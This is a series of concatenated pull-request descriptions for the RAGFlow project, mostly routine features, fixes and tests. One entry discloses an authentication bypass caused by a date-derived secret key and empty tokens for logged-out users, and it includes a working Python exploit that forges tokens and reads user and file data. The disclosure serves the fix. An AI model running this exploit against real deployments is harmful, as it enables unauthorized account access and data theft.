- [x] New Feature (non-breaking change which adds functionality)
**Context and Purpose:**
This PR automatically remediates a security vulnerability:
- **Description:** Detected possible formatted SQL query. Use
parameterized queries instead.
- **Rule ID:**
python.lang.security.audit.formatted-sql-query.formatted-sql-query
- **Severity:** HIGH
- **File:** rag/utils/opendal_conn.py
- **Lines Affected:** 98 - 98
This change is necessary to protect the application from potential
security risks associated with this vulnerability.
**Solution Implemented:**
The automated remediation process has applied the necessary changes to
the affected code in `rag/utils/opendal_conn.py` to resolve the
identified issue.
Please review the changes to ensure they are correct and integrate as
expected.
### What problem does this PR solve?
Feat: Solved the conflict between the Handle click and drag events of
the canvas node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#8391#8404
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add Tavily operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where tag content would overflow the container
#8392
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Improve the tavily form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix code debug may corrupt by history answer.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add curl example for interacting with the RAGFlow MCP server. Special
thanks to @writinwaters for his expert refinement.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <cai.keith@gmail.com>
### What problem does this PR solve?
Feat: Synchronize the data of the tavily form to the canvas node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Deleting the last tool of the agent will delete the tool node
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Save the agent tool data to the node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update Docker image version badges and references from v0.19.0 to
v0.19.1
- Modify version mentions in all localized README files (id, ja, ko,
pt_br, tzh, zh)
- Update version in docker/README.md and related documentation files
- Includes updates to Helm values and Python SDK dependencies
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Correct boolean parsing for 'desc' parameter in document_app.py to
properly handle string values
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes a minor grammar issue in a user-facing error message. The original
message said "large than" instead of the correct comparative form
"larger than". Just a quick fix I noticed while reading the code.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the initial value of the slice method was not
displayed in the dialog box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. rename var
2. update if statement
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add a tool operator node from the agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix illegal variable name in Jinja2. #8316.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix sandbox sandalone context error. #8307.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add tool nodes and tool drop-down menu #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add child nodes and their connecting lines by clicking #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Highlight current language in README badges by changing color for
Traditional and Simplified Chinese
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
- Replace hardcoded 255-byte file name length checks with
FILE_NAME_LEN_LIMIT constant
- Update error messages to show the actual limit value
- #8290
### Type of change
- [x] Refactoring
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
- Add validation for empty filenames in document_app.py and trim
whitespace
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add a child operator node by clicking the operator node anchor
point #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the anchor point positioning of the classification operator
node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update readme
### Type of change
- [x] Documentation Update
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
- Add filename length validation (<=255 bytes) for document
upload/rename in both HTTP and SDK APIs
- Update error messages for consistency
- Fix comparison operator in SDK from '>=' to '>' for filename length
check
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use the node ID as the key to destroy different types of form
components to switch the form values of the same type of operators
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the parameters could not be set after
switching the large model parameter template. #8282
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add documentation of authorization header for MCP server based on OAuth
2.1
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### Description
This PR introduces two new environment variables, `DOC_BULK_SIZE` and
`EMBEDDING_BATCH_SIZE`, to allow flexible tuning of batch sizes for
document parsing and embedding vectorization in RAGFlow. By making these
parameters configurable, users can optimize performance and resource
usage according to their hardware capabilities and workload
requirements.
### What problem does this PR solve?
Previously, the batch sizes for document parsing and embedding were
hardcoded, limiting the ability to adjust throughput and memory
consumption. This PR enables users to set these values via environment
variables (in `.env`, Helm chart, or directly in the deployment
environment), improving flexibility and scalability for both small and
large deployments.
- `DOC_BULK_SIZE`: Controls how many document chunks are processed in a
single batch during document parsing (default: 4).
- `EMBEDDING_BATCH_SIZE`: Controls how many text chunks are processed
in a single batch during embedding vectorization (default: 16).
This change updates the codebase, documentation, and configuration files
to reflect the new options.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
### Additional context
- Updated `.env`, `helm/values.yaml`, and documentation to describe
the new variables.
- Modified relevant code paths to use the environment variables instead
of hardcoded values.
- Users can now tune these parameters to achieve better throughput or
reduce memory usage as needed.
Before:
Default value:
<img width="643" alt="image"
src="https://github.com/user-attachments/assets/086e1173-18f3-419d-a0f5-68394f63866a"
/>
After:
10x:
<img width="777" alt="image"
src="https://github.com/user-attachments/assets/5722bbc0-0bcb-4536-b928-077031e550f1"
/>
### What problem does this PR solve?
Fix mixing different embedding models in document parsing.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
This PR fixes two issues in the OpenDAL storage connector:
1. The `health` method was missing, which prevented health checks on
the storage backend.
3. The initialization of the `opendal.Operator` object included a
redundant scheme parameter, causing unnecessary duplication and
potential confusion.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Background
- The absence of a `health` method made it difficult to verify the
availability and reliability of the storage service.
- Initializing `opendal.Operator` with both `self._scheme` and
unpacked `**self._kwargs` could lead to errors or unexpected behavior
if the scheme was already included in the kwargs.
### What is changed and how it works?
- Adds a `health` method that writes a test file to verify storage
availability.
- Removes the duplicate scheme parameter from the `opendal.Operator`
initialization to ensure clarity and prevent conflicts.
before:
<img width="762" alt="企业微信截图_46be646f-2e99-4e5e-be67-b1483426e77c"
src="https://github.com/user-attachments/assets/acecbb8c-4810-457f-8342-6355148551ba"
/>
<img width="767" alt="image"
src="https://github.com/user-attachments/assets/147cd5a2-dde3-466b-a9c1-d1d4f0819e5d"
/>
after:
<img width="1123" alt="企业微信截图_09d62997-8908-4985-b89f-7a78b5da55ac"
src="https://github.com/user-attachments/assets/97dc88c9-0f4e-4d77-88b3-cd818e8da046"
/>
### What problem does this PR solve?
Feat: Reset the default values of large model parameters
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the style of the canvas operator node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update all test file creation functions to use English text instead of
Chinese for consistency with the project's language standards. This
includes DOCX, Excel, PPT, PDF, TXT, MD, JSON, EML, and HTML test file
generators.
### Type of change
- [x] Update test case
### What problem does this PR solve?
Progress is only updated if it's valid and not regressive.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add query references to "RewriteQuestion:AllNightsSniff" in multiple
components
- Set "selected" to false for retrieval node
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add canvas node toolbar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Implement RAGFlowWebApiAuth class for web API authentication
- Add comprehensive test cases for KB CRUD operations
- Set up common fixtures and utilities in conftest.py
- Add helper functions in common.py for web API requests
The changes establish a complete testing framework for knowledge base
management via web API endpoints.
### Type of change
- [x] Add test case
### What problem does this PR solve?
Get rid of 'RedisDB.get_unacked_iterator queue rag_flow_svr_queue_1
doesn't exist'
----
Edit: revert to original message collection logic.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
This PR resolves the inconsistency in the opendal configuration where
both `schema` and `scheme` were used as keys. The code and
configuration file now consistently use `scheme`, which helps prevent
configuration errors and runtime issues. This change improves code
clarity and maintainability.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Additional context
- Updated both `conf/service_conf.yaml` and
`rag/utils/opendal_conn.py` to use `scheme` instead of `schema`
- No breaking changes to other configuration fields
### What problem does this PR solve?
Fix the restriction of forcing similarity_threshold=0 and page_size=30
when doc_ids is not empty
#8228
---------
Co-authored-by: shiqing.wusq <shiqing.wusq@dtzhejiang.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
The issue of reporting the 「Can't inference the where the component
input is. Please identify whose output is this component's input」error
when creating an Agent using the Customer service template has been
resolved.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change allocate_container_blocking Calculate Time by async time
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Connect conditional operators to other operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Fix boolean parsing for 'desc' parameter in kb_app.py to properly
handle string values
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR investigates the cause of #7957.
TL;DR: Incorrect similarity calculations lead to too many candidates.
Since candidate selection involves interaction with the LLM, this causes
significant delays in the program.
What this PR does:
1. **Fix similarity calculation**:
When processing a 64 pages government document, the corrected similarity
calculation reduces the number of candidates from over 100,000 to around
16,000. With a default batch size of 100 pairs per LLM call, this fix
reduces unnecessary LLM interactions from over 1,000 calls to around
160, a roughly 10x improvement.
2. **Add concurrency and timeout limits**:
Up to 5 entity types are processed in "parallel", each with a 180-second
timeout. These limits may be configurable in future updates.
3. **Improve logging**:
The candidate resolution process now reports progress in real time.
4. **Mitigates potential concurrency risks**
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
- Move common constants (HOST_ADDRESS, INVALID_API_TOKEN, etc.) to
configs.py
- Update test imports to use centralized configs
- Clean up duplicate constant definitions across test files
This improves maintainability by centralizing configuration.
### Type of change
- [x] Refactoring test case
### What problem does this PR solve?
- Fix test assertions in test_delete_chunks.py to expect empty results
after deletion
Action 7619
### Type of change
- [x] Bug Fix test cases
### What problem does this PR solve?
Feat: Display the connection lines between multiple conditions of the
conditional operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq
- Add pagerank update logic in dataset update endpoint
- Update API documentation to reflect changes
- Modify related test cases and SDK references
#8208
This change makes pagerank a mutable property that can only be set after
dataset creation, and only when using elasticsearch as the doc engine.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Validate that pagerank updates are only allowed when using elasticsearch
as the document engine. Return an error if pagerank is set while using a
different doc engine, preventing potential inconsistencies in document
scoring.
#8208
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8157
The current master code should work fine, but hI ave some warnings, so I
added a declare to improve the warning
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The value selected in the Select component only displays the icon
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#8074
Oss support opendal(including mysql)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Validate dataset name in knowledge base update endpoint to ensure:
- Name is a non-empty string
- Name length doesn't exceed DATASET_NAME_LIMIT
- Whitespace is trimmed before processing
Prevents invalid dataset names from being saved and provides clear error
messages.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix auto-keyword and auto-question fail with qwq model. #8189
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add SwitchForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change the condition from checking for >1 to >=1 when validating
duplicate knowledgebase names to properly catch all duplicates. This
ensures no two knowledgebases can have the same name for a tenant.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Trim whitespace before checking for empty dataset names
- Change length check from >= to > DATASET_NAME_LIMIT for consistency
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add Qwen3-Embedding text-embedding-v4.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Rename `api_key` fixture to `HttpApiAuth` across all test files
- Update all dependent fixtures and test cases to use new naming
- Maintain same functionality while improving naming clarity
The rename better reflects the fixture's purpose as an HTTP API
authentication helper rather than just an API key.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
- Update chat assistant tests to use dataset.id directly in payloads
- Enhance document parsing tests with better condition checking
- Add explicit type hints and improve timeout handling
Action_7556
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display the agent node running timeline #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display agent operator call log #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enhanced the image rotation handling by evaluating the original
orientation, clockwise 90°, and counter-clockwise 90° rotations. The
image with the highest text recognition score is now selected, improving
accuracy for text detection in images with aspect ratios >= 1.5.
#8166
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenrui.cao <wenrui.cao@univers.com>
### What problem does this PR solve?
fixes the following deprecation emitted from `download_deps.py`:
```
UserWarning: `local_dir_use_symlinks` parameter is deprecated and will be ignored. The process to download files to a local folder has been updated and do not rely on symlinks anymore. You only need to pass a destination folder as`local_dir`
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Improve robustness of Jina, Nvidia, and SILICONFLOW embedding models by:
1. Adding try-catch blocks for JSON decode errors
2. Logging error details including response content
3. Raising exceptions with meaningful error messages
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Let system variables appear in operator prompts #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Replace manual venv activation with `uv run` for pytest commands
- Add dynamic test level (p2/p3) based on GitHub event type
- Simplify test commands by removing redundant directory changes
### Type of change
- [x] Update Action
### What problem does this PR solve?
for kb.app list method when owner_ids the total calculate is wrong (now
will base on the paged result to calculate total)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Constructing query parameter options for the Retrieval operator
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Issue: #8051
The current implementation assumes JWKS endpoints follow the standard
`/.well-known/jwks.json` convention. This breaks authentication for OIDC
providers that use non-standard JWKS paths, resulting in 404 errors
during token validation.
Root Cause Analysis
- The OpenID Connect specification doesn't mandate a fixed path for JWKS
endpoints
- Some identity providers (like certain Keycloak configurations) use
custom endpoints
- Our previous approach constructed JWKS URLs by convention rather than
discovery
### Solution Approach
Instead of constructing JWKS URLs by appending to the issuer URI, we
now:
1. Properly leverage the `jwks_uri` from the OIDC discovery metadata
2. Honor the identity provider's actual configured endpoint
```python
# Before (fragile approach)
jwks_url = f"{self.issuer}/.well-known/jwks.json"
# After (standards-compliant)
jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR aims to slove #8120 which request a better error display of
duplicate column names.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add agent operator node from agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Consolidate HTTP API test fixtures using batch operations
(batch_add_chunks, batch_create_chat_assistants)
- Fix fixture initialization order in clear_session_with_chat_assistants
- Add new SDK API test suite for session management
(create/delete/list/update)
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
Feat: Display chat content on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Convert the prompt field of the agent operator to an array #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Implement new SDK API test cases for chat assistant CRUD operations
- Enhance HTTP API concurrent tests to use as_completed for better
reliability
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
- Consolidate database operations within single try-except blocks in the
methods
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Support passing the attribute check when the upstream has already made
sure it.
### Type of change
- [X] Performance Improvement
### What problem does this PR solve?
Previously when LLM.model_name was not configured:
- System incorrectly defaulted to 'deepseek-chat' model
- This caused permission errors for unauthorized tenants
Now:
- Use tenant's default chat_model configuration first
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Previously when LLM.rerank_model was not configured:
- SDK would pass None as the value
- Database field with null=False constraint would reject it
- Caused storage failures for unset rerank_model cases
Now:
- SDK checks for None value before database operations
- Provides empty string as default when rerank_model is unset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Improve concurrent test cases by using as_completed for better
reliability
- Rename variables for clarity (chunk_num -> count)
- Add new SDK API test suite for chunk management operations
- Update HTTP API tests with consistent concurrency patterns
### Type of change
- [x] Add test cases
- [x] Refactoring
### What problem does this PR solve?
Feat: Reference the output variable of the upstream operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Enables the message operator form to reference the data defined by
the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Receive reply messages of different event types from the agent
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, as long as there are tasks in Redis, this loop will keep
getting the tasks. This will lead to a single task executor with many
tasks in the pending state. Then we need to wait for the pending tasks
to get them back in the queue.
In first place, if we set the `MAX_CONCURRENT_TASKS` to X, then only X
tasks should be picked from the queue, and others should be left in the
queue for other `task_executors` or be picked after 1 of the spots in
the current executor gets free. This PR ensures this behavior.
The additional changes were due to the Ruff linting in pre-commit. But I
believe these are expected to keep the coding style.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Added name filtering capability for Dataset.list_documents()
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
An exception is thrown only when the json file has only two keys, `code`
and `message`. In other cases, response.content is returned normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where using the new quote markers would cause
dialogue output to have delete symbols #7623
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Convert the inputs parameter of the begin operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Solved the problem that BeginForm would get stuck when modifying
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
now Streamning logic is not match with none streaming logic, which may
introduce down stream can not find upstream components.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Description
There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.
### Source - Sink Analysis
**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token
**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys
def exploit_ragflow(target):
# Generate token with predictable key
daily_key = str(date.today())
serializer = URLSafeTimedSerializer(secret_key=daily_key)
malicious_token = serializer.dumps("")
print(f"Target: {target}")
print(f"Secret key: {daily_key}")
print(f"Generated token: {malicious_token}\n")
# Test endpoints
endpoints = [
("/v1/user/info", "User profile"),
("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
]
auth_headers = {"Authorization": malicious_token}
for path, description in endpoints:
print(f"Testing {description}...")
response = requests.get(f"{target}{path}", headers=auth_headers)
if response.status_code == 200:
data = response.json()
if data.get("code") == 0:
print(f"SUCCESS {description} accessible")
if "user" in path:
user_data = data.get("data", {})
print(f" Email: {user_data.get('email')}")
print(f" User ID: {user_data.get('id')}")
elif "file" in path:
files = data.get("data", {}).get("files", [])
print(f" Files found: {len(files)}")
else:
print(f"Access denied")
else:
print(f"HTTP {response.status_code}")
print()
if __name__ == "__main__":
target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
exploit_ragflow(target_url)
```
**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials
**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899
Co-authored-by: nkoorty <amalyshau2002@gmail.com>
### What problem does this PR solve?
Feat: Create empty agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Removed hardcoded Zhipu API key from codebase
- New requirement: Tests now require ZHIPU_AI_API_KEY environment
variable
Example: export ZHIPU_AI_API_KEY=your_api_key_here
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
The Unicode codepoint ',' (U+FF0C) is meant to be used in Chinese text,
but this is English text. It looks like a comma followed by a space, but
isn't. Of course I didn't change actual Chinese text.
### What problem does this PR solve?
Mixup of Unicode characters. This is probably unnoticed by most users,
but I wonder if screen readers would read it out differently or if LLMs
would trip up on it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add RunSheet component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix parser_config=None handling in create_dataset
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
## Summary
Fixed grammar errors and improved clarity in prompt templates throughout
`rag/prompts.py`.
## Changes Made
- **Fixed incomplete sentence**: `"If the user's latest question is
completely, don't do anything"` → `"If the user's latest question is
already complete, don't do anything"`
- **Improved phrasing**: `"of like [ID:i]"` → `"such as [ID:i]"`
- **Added missing articles**: `"give top 3"` → `"give the top 3"`
- **Fixed prepositions**: `"in language of"` → `"in the same language
as"`
- **Corrected spelling**: `"Jappanese"` → `"Japanese"`
- **Standardized formatting**: Consistent role descriptions and
punctuation
## Impact
These changes improve prompt readability and should make instructions
clearer for the underlying language models.
## Test Plan
- [x] Verified changes maintain original prompt functionality
- [x] No breaking changes to prompt structure or expected outputs
Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>
### What problem does this PR solve?
Feat: Add DynamicPrompt component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add AgentNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8006
The category should work well, but the category's downstream seems to be
unable to get the upstream output.
Add the category's output as an attribute.
However, in base.py, there is logic
` if self.component_name.lower().find("switch") < 0 and
self.get_component_name(u) in ["relevant", "categorize"]:
continue`
If goto this cases will not tried to get output from Category (but I do
not have full context about this if logic).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Construct RetrievalForm with original fields #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
sync test group from sdk/python/pyproject.toml to top pyproject.toml
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update the synonym dictionary file with relevant time and date to
prevent synonyms from being mistakenly escaped.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Add the example component of the classification operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Use one-way data flow to synchronize the form data to the canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix unnecessary truncation in markdown parser. So that markdown can work
perfectly like
[this](https://github.com/infiniflow/ragflow/issues/7824#issuecomment-2921312576)
in #7824, supporting multiple special delimiters.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change filename length limit from 128 to 256
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
**Fix: Prevent Flask hot reload from hanging due to early thread
startup**
### What problem does this PR solve?
When running the Flask server with `use_reloader=True` (enabled during
debug mode), modifying a Python source file would trigger a reload
detection (`Detected change in ...`), but the application would hang
instead of restarting cleanly.
This was caused by the `update_progress` background thread being started
**too early**, often within the main module scope.
This issue was reported in
[#7498](https://github.com/infiniflow/ragflow/issues/7498).
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---
**Summary of changes:**
- Wrapped `update_progress` launch in a `threading.Timer` with delay to
avoid premature thread execution.
- Marked thread as `daemon=True` to avoid blocking process exit.
- Added `WERKZEUG_RUN_MAIN` environment check to ensure background
threads only run in the reloader child process (the actual Flask app).
- Retained original behavior in production mode (`debug=False`).
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
If the name field is not specified, Docker Compose will default to using
`docker` as the project name. This may cause conflicts with other
default projects, leading to unintended operations when executing
`docker compose` commands.
### What problem does this PR solve?
When executing Docker Compose commands, interference occurs between
multiple default projects, leading to operational chaos.
### Type of change
- [x] Other (please describe):
### What problem does this PR solve?
When performing the dify_retrieval, the metadata of the document was
empty.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When deleting knowledge base documents in RAGFlow, the current process
only removes the block texts in Elasticsearch and the original files in
MinIO, but it leaves behind many binary images and thumbnails generated
during chunking. This pull request improves the deletion process by
querying the block information in Elasticsearch to ensure a more
thorough and complete cleanup.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Install why-did-you-render to detect component updates #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7753
The internal is due to when the selected row keys change will trigger a
testing, but I do not know why.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add InnerBlurInput component to avoid frequent updates of zustand
causing the input box to lose focus #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix code component debug issue. #7908.
I delete the additions in #7933, there is no semantic meaning `output`
